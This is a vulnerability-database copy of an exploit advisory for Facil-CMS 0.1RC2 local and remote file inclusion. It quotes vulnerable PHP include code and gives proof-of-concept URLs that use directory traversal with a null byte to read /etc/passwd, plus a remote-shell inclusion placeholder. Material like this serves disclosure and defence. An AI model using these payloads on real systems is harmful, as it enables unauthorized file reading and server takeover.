Facil-CMS 0.1RC2 - Local/Remote File Inclusion
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2008-7176 | 12 Jun 200800:00 | – | circl | |
| CVE-2008-7176 | 8 Sep 200910:00 | – | cve | |
| CVE-2008-7176 | 8 Sep 200910:00 | – | cvelist | |
| Facil-CMS 0.1RC - Multiple Local File Inclusions | 12 Jun 200800:00 | – | exploitdb | |
| EUVD-2008-7135 | 7 Oct 202500:30 | – | euvd | |
| CVE-2008-7176 | 8 Sep 200910:30 | – | nvd | |
| Directory traversal | 8 Sep 200910:30 | – | prion |
########################################################
Facil-CMS (LFI/RFI) Vulnerability
########################################################
[+]Title : Facil-CMS Multiple Vulnerability
[+]Version: 0.1RC2
[+]Download: http://sourceforge.net/projects/facil-cms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s To: all friends
########################################################
-=[ Vuln C0de ]=-
***********************
[-]facil-cms/index.php
require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
$config = new facilConfig();
$utils = new facilUtils();
if($utils->is_module($config->getSiteIndex()))
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');
***********************
[-]facil-cms/modules.php
require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
if($_POST['modload'] && !eregi("/", $_POST['modload']))
{
$_MODLOAD = trim($_POST['modload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
{
$FILELOAD = trim($_POST['fileload']);
$_MODLOAD = false;
$FILELOAD = false;
if($_POST['admload'] && !eregi("/", $_POST['admload']))
{
$_ADMLOAD = trim($_POST['admload']);
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
$_ADMLOAD = false;
$FILELOAD = false;
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');
*******************
[-]facil-cms/includes/facil-settings.php
if(!isset($_SESSION['FACIL_LANGUAGE']))
{
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
}
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');
*******************
-=[ Proof Of Concept ]=-
http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
Similar reference:
http://www.exploit-db.com/exploits/5792
http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]
########################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01972